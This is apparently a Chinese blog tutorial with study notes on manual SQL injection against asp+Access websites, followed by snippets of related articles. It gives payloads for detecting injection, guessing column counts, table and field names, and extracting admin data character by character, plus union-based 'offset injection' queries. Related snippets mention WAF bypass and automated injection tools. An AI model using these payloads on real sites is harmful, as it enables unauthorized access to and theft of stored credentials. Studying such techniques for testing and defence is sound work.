SQL注入学习--access

最新推荐文章于 2024-01-03 11:11:10 发布
最新推荐文章于 2024-01-03 11:11:10 发布
阅读量1.2k 收藏 1
点赞数 1
文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ghoooos/article/details/122774316
版权

SQL注入学习–access

一、access数据库
access数据库没有库只能猜表

二、判断access数据库
access数据库一般采用asp+access

三、判断是否存在注入
1.and判断
and 1=1 页面正确
and 1=2 页面错误
eg:
?id=1513 and 1=1
?id=1513 and 1=2
在这里插入图片描述

2.or判断
or 1=2 页面正常
or 1=1 页面正常
eg:
?id=1513 or 1=2
在这里插入图片描述
?id=1513 or 1=1
在这里插入图片描述
可以看出虽然页面能正常显示,但是图片有所改变,内容显示有误

四、猜测流程
1.猜测字段数
一般使用order by二分法猜测字段数
二分法 从初始字段数猜测,页面显示正确则加倍,错误则减半
eg: 从5开始猜测,order by 5页面显示正确则,翻倍,order by 10又正确,翻倍,order by 20错误,减半order by 15,直到正确猜测到准确数字

2.猜测表明是否存在
主要两种方法
eg:猜测admin表是否存在
and 0<>(select count(*) from admin)
and exists(select * from admin)

3.判断字段是否存在
eg:猜测admin表是否存在admin表
and (select count(*) from admin where len(admin)>0)
and exists(select admin from admin)

4.猜测数据长度
eg:猜测admin表中admin字段的数据长度是否等于5
and (select count(*) from admin where len(admin)=5)
and (select top 1 len(admin) from admin)=5

5.猜测数据字符的ascll值
eg:猜测admin表中admin字段数据中的第一个字符的ascll值
and (select top 1 asc(mid(admin,1,1)) from admin)=97

在这里插入图片描述
五、access偏移注入
以字段数为22为例

一级偏移
用一个一个*代替直到回显正确 22-16=6,代表admin有5个字段 22-6*2=10构造新语句
union select 1,2,3,4,5,6,7,8,9,10,a.id,b.id,c.id,* from (admin as a inner join admin as b on a.id = b.id)

二级偏移
union select 1,2,3,4,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id = b.id)inner join admin as c on a.id=c.id)

ghoooos
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入access数据库
weixin_46476861的博客
02-18 418
猜解数据库表名 猜解数据库字段名 猜解字段内容 order by与union select联合查询,可以快速地获得字段长度及字段内容 自动化注入工具破解数据库方法 穿山甲工具 havij(胡萝卜标志)工具 ...
*sql注入实战--记一次绕过WTS-WAF拦截注入**
Q963260583的博客
06-04 8954
记一次绕过WTS-WAF拦截注入 关键字搜索 inurl:asp.id= 搜出了一个Asp+Access的小网站,接着尝试进行注入。 但是碰到了拦截,尝试用注释污染参数进行绕过,结果还是不行。 如图所示: 接着尝试改用+号替代空格,居然成功了。 如图: 接着就是尝试用order by 函数匹配了,而且order by 函数也不拦截,得出结果为13. 然后就是进行数据查询了,同时进行表名的猜...
sql注入Access
华丽的贵族
09-05 208
access网站注入 - 测试网站: http://www.xxxx.com/news_view.asp?ClassID=1&newsid=60 - 注入步骤: 1.判断网站是否为access数据库 常用方法: 1)and (select count() from sysobjects)>0* 不报错则为SQL表 and (select count() from msysobj...
【网络安全-SQL注入(3)】SQL注入----一篇文章教你access数据库SQL注入以及注入点利用
m0_67844671的博客
10-01 1253
本篇文章以凡诺企业网站管理系统为例,讲解了access数据库是如何进行SQL注入的,以及注入点如何利用,如何判断查询字段个数,如果用联合查询爆出数据库数据等;【网络安全-SQL注入SQL注入----一篇文章教你access数据库SQL注入以及注入点利用。SQL注入【3】;
SQL注入access数据库
KHOST的博客
04-23 416
首先是sql注入产生的条件: 1.参数的传递 2.参数值可以带入到数据库 我这里是本地搭建的环境,接另外一种方法注入 手工注入值半猜解 第一步 判断是否可以注入 URL:http://localhost:58031/Production/PRODUCT_DETAIL.asp?id=1139 and 1=1 返回正常 and 1=2 返回不正常 第二步 猜解数据库表名 语句...
SQL 注入之ACCESS
Kevin
07-27 3760
如果你已经掌握了SQL注入漏洞的一些相关的基础知识,那是不是觉得看了理论有一种想急于知道如何实际动手操作的冲动,好吧,Let’s go,这篇文章我们就来实战SQL注入,不过针对网站的数据库ACCESS的,毕竟在国内都是用虚拟机,一般只有FTP上传权限,所以还是很有市场的。 首先要注意的是,如果你以前没试过SQL注入的话,那么第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好
第二节 针对asp+access网站进行sql注入利用-01
09-15
ASP+Access网站SQL注入利用 在本节中,我们将探讨针对ASP+Access网站的SQL注入利用。ASP(Active Server Pages)是微软公司开发的服务器端脚本环境,用于创建动态交互式网页并建立强大的web应用程序。Access是微软...
SQL注入天书-ASP注入漏洞全接触.pdf
07-09
在书中,作者以ASP+AccessSQLServer的组合为例,详细介绍了SQL注入的原理、检测和利用技巧。首先,通过一个实际案例,解释了如何通过错误提示判断是否存在SQL注入漏洞。例如,当URL中的参数后添加单引号导致服务器...
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sql注入网站源码
04-09
这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这类漏洞非常有价值。ASP是微软开发的一种服务器端脚本语言,常用于构建动态网站。 在ASP中,...
Access数据库中的SQL注入(无waf)
kali_boy的博客
11-27 3391
一.关于Access数据库和简单注入用到的SQL 1.access数据库 Microsoft Office Access是由微软发布的关系数据库管理系统,也就是说在我们的
sql注入access(持续补充...)
守卫者安全
06-22 1293
一、认识access数据库 先来介绍一下这个数据库,Microsoft Office Access,Microsoft Office Access是由微软发布的关系数据库管理系统。它结合了MicrosoftJet Database Engine 和图形用户界面两项特点,是 Microsoft Office 的系统程序之一。 优势:提高速度和减少代码量 缺点:数据库过大时,一般ACCESS...
WEB安全之:Access 数据库 SQL 注入
f_carey的博客
06-09 721
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 SQL 注入之:Access 数据库1 Access 数据库 SQL 注入基础知识1.1 Access 注入常用语句及函数1.2 Access 中的 `msysobjects `2 Access 查询信息2.1 `exists ()` 布尔型注入查询方法2.1.1 查询表名2.1.2 查询表字段名称2.1..
SQL注入Access注入 (手工)
adminlalala的博客
04-06 3036
什么是SQL注入SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 ----百度百科 寻找注入点 首先呢,在网站中寻找传递参数的页面,也就是寻找注入点。 判断注入 找到页面(注入...
SQL注入(Access、Mssql)
最新发布
jxy158212的博客
01-03 1345
之前的文章,已经详细介绍了sql注入的原理,和常见sql注入方式,并以MySql数据库进行了简单的示例。接下来,我们将以Access和Mssql数据库为例进行讲解。
有关access数据库sql注入的问题
a843538946的专栏
12-12 522
设计一个access 数据库如下   如果用这个语句 SELECT * FROM 表1 where id=1 union select 1,2,3; 会报错  如果改成这样 SELECT * FROM 表1 where id=1 union select 1,2,3 from 表1; 则没问题 而且结果如下 发现 1,2,3是放在前面的 再改成这样SELECT * FRO...
#学习笔记#SQL注入原理——手工注入access数据库
cheese0.0的博客
07-30 1034
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面查询的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 当应用程序使用输入内容来构造动态sql语句以访问数据库时,会发生sql注入攻击。如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的 字符串来传递,也会发生sql注入SQL注入可以协助攻击者登录数据库执行命令,有些会使账户获得更高的权限对数据库进行操...
Access数据库SQL注入(Access SQL Injection)
weixin_33753845的博客
03-22 218
一、MicrosoftOffice Access数据库手工注入语句 1、参数后面加 ’ 、and 1=1、and 1=2看返回状态判断是否存在注入点2、参数后面加 and exists(select*from admin)猜表名 返回正常页面表示存在(admin)3、参数后面加 and exists(selectusername from admin)猜(admin)表中是否存在列...
SQL注入&Access&Mysql
weixin_54882883的博客
05-13 483
知识点: 1、脚本代码与数据库前置知识 2、Access数据库注入-简易&偏移 3、MYSQL数据库注入-简易&权限跨库 前置知识: SQL注入漏洞产生原理分析 SQL注入漏洞其实他就产生在脚本代码和数据库正在通讯会话的时候产生的 脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的SQL语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)
ASP+Access网站SQL注入攻击详解-01
"针对asp+access网站的SQL注入利用教程" 在网络安全领域,SQL注入是一种常见的攻击手段,尤其针对那些使用ASP(Active Server Pages)和Access数据库的网站。本教程主要聚焦于如何识别和利用此类网站的SQL注入漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值